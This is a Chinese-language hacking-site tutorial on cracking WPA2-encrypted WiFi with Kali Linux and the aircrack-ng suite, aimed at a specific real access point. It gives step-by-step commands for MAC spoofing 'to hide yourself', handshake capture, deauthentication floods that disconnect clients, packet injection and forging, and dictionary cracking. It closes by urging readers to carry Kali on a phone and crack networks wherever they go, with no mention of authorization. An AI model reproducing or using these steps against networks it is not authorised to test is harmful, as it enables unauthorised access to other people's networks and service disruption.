实战破解wap2加密wifi

华盟原创文章投稿奖励计划

        实战破解wap2加密wifi

  所以,今天我们简单展示下kali linux2.0使用aircrack-ng破解wpa2的姿势。

  1.已经启动好的kali linux系统。(ps:这是用U盘在真机启动,就是前几天我们华盟搞活动赠的那个U盘~~~)

  2.打开终端,首先启动网卡

  ifconfig 查看是否识别当前无线网卡

      实战破解wap2加密wifi

  图1

  然后呢,为了在攻击时隐藏自己,可以修改下自己mac,这个改动会在重启后自动恢复,也可以不改。

  先ifconfig wlan0 down 停掉网卡,或者airmon-ng stop wlan0也可以停,停掉再改mac,然后改网卡模式,为monitor(监听)模式,然后ifconfig wlan0 up启动网卡。

        实战破解wap2加密wifi

  图2

  启动网卡之后输入airodump-ng wlan0启动监听,能看到附近wifi信息就说明网卡可以正常监听,就可以进行下一步了,查看完后按ctrl+c停止监听。

       实战破解wap2加密wifi

  图3

  参数介绍:BSSID :无线ap的mac地址

  PWR:信号强度,越大越强

  Beacons:无线通告编号

  #Data:被捕获到的数据分组的数量,包括广播分组

  #s:过去10秒钟内每秒捕获数据分组的数量。

  CH:信道号(从Beacons中获取)

  MB:无线所支持的最大速率

  ENC:使用的加密算法体系

  CIPHER:检测到的加密算法。

  AUTH:使用的认证协议

  ESSID:即平时所说的ssid号,无线设备能直接搜到的wifi名称

  STATION:客户端mac地址

  Rate:传输率

  Lost:过去10秒钟内丢失的数据分组

  Frames:客户端发送的数据分组数量。

  Probe:被客户端查探的ESSID

  接下来选择指定ap进行抓包破解,这里选择mac为D4:EE:07:21:56:2A的,工作在10信道的HiWiFi来破解。

  # airodump-ng -c 10 -w hiwifi --bssid D4:EE:07:21:56:2A wlan0

        实战破解wap2加密wifi

  图4

  以上命令执行成功后,会生成hiwifi-01.cap的文件,而不是hiwifi.cap,这是因为airodump-ng为了方便后面破解时的调用,所以对文件按顺序进行编号,于是就有了-01这样的序号,以此类推。当再次使用同样的文件名保存时,就会生产hiwifi-02.cap的文件。

  接下来使用aireplay-ng命令来发送一些流量给无线路由器,以便更快获取数据。

  airodump-ng的抓包界面不要关,重新开启一个终端来进行aireplay-ng攻击

      实战破解wap2加密wifi

  图5

  格式如下:

  Aireplay-ng 的 6 种攻击模式

  -0 Deautenticate 冲突模式

  使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。

  如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0 参数说明:

  【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)

  【-a】:设置 ap 的 mac

  【-c】:设置已连接的合法客户端的 mac。

  如果不设置-c,则断开所有和 ap 连接的合法客户端。

aireplay-ng -3 -b <ap mac> -h <my mac> wifi0

  注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

  -1 fakeauth count 伪装客户端连接

  这种模式是伪装一个客户端和 AP 进行连接。

  这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让 AP 接受数据包,必须使自己的网卡和 AP 关联。如果没有关联的话,目标 AP 将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。

  用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生 ARP 包。

aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0

  参数说明:

  【-1】:伪装客户端连接模式,后面跟延时

  【-e】:设置 ap 的 essid

  【-a】:设置 ap 的 mac

  【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)

  -2 Interactive 交互模式

  这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式

  1.这种模式主要用于研究学习无客户端,先用-1 建立虚假客户端连接然后直接发包攻击 ,

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0

  参数说明:

       实战破解wap2加密wifi

  【-2】:交互攻击模式

  【-p】:设置控制帧中包含的信息(16 进制),默认采用 0841

  【-c】:设置目标 mac 地址

  【-b】:设置 ap 的 mac 地址

  【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)

  2.提取包,发送注入数据包 aireplay-ng -2 –r -x 1024 wifi0 发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择 1024。

  -3 ARP-request 注入攻击模式

  这种模式是一种抓包后分析重发的过程 这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和 ap 之间通信,少量数据就可产生有效 ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到 ARP request.,则这种攻击就会失败。

  如果合法客户端和ap之间长时间内没有 ARP request,可以尝试同时使用-0 攻击. 如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效 ARP request。再通过-3 模式注入。

aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0

  参数说明:

  【-3】:arp 注入攻击模式

  【-b】:设置 ap 的 mac

  【-h】:设置

  【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用 512(也可不定义)

  -4 Chopchop 攻击模式

  用以获得一个包含密钥数据的 xor 文件 这种模式主要是获得一个可利用包含密钥数据的 xor 文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。

aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 参数说明:

  【-b】:设置需要研究学习的 AP 的 mac

  【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)

  -5 fragment 碎片包攻击模式

  用以获得 PRGA(包含密钥的后缀为 xor 的文件) 这种模式主要是获得一个可利用 PRGA,这里的 PRGA 并不是 wep key 数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包,当 AP 重广播时,一个新的 IVS 将产生,我们就是利用这个来研究学习 !

aireplay-ng -5 -b <ap mac> -h <my mac> wifi0

  【-5】:碎片包攻击模式

  【-b】:设置 ap 的 mac

  【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)

  Packetforge-ng:数据包制造程序 Packetforge-ng   <mode><options>Mode

  【-0】:伪造 ARP 包

  packetforge-ng -0 -a -h wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp

  参数说明:

  【-0】:伪装 arp 数据包

  【-a】:设置 ap 的 mac

  【-h】设置虚拟伪装连接的 mac(即自己的 mac)

  【-k】说明:设置目标文件 IP 和端口

  【-l】说明:设置源文件 IP 和端口

  【-y】说明:从 xor 文件中读取 PRGA。后面跟 xor 的文件名。

  【-w】设置伪装的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究学习主程序

  Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b name-01.ivs )

  参数说明:

  【-n】:设置 WEP KEY 长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap

  参数说明:

  【-x】:设置为暴力研究学习模式

  【-f】:设置复杂程度,wep 密码设置为 1,wpa 密码设置为 2

  aircrack-ng -w password.txt ciw.cap

  【-w】:设置为字典研究学习模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。

  那么我们该监听到什么时候才可以呢?一般来说data在一万以上的时候,大概可以尝试一下了。

  ctrl+c停止抓包,

  然后执行

  #aircrack-ng -w 你的字典 hiwifi.cap

  字典格式好多,有txt有dic等等。

  当你的字典里有密码时,匹配成功就破解出来了。

        实战破解wap2加密wifi

    图6

        实战破解wap2加密wifi

  图7

  key found!破解成功,话说复杂密码真的真的真的好费时间,本人好多次差点放弃,心想,有这功夫还不如花几块钱来个流量加油包呢~~但是,只要咱做到这步了就可以骄傲的说,咱可以破wpa2加密的无线了,哈哈。

  今天就简单讲一下基础,后期大家自由发挥,学的好可以给尝试给手机装kali,走到哪儿破到哪儿~想想就激动~

  最后祝大家能在互联网安全这条路上越走越远!加油!

原文地址:https://hack.77169.com/201606/227130.shtm

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/16179.html

发表评论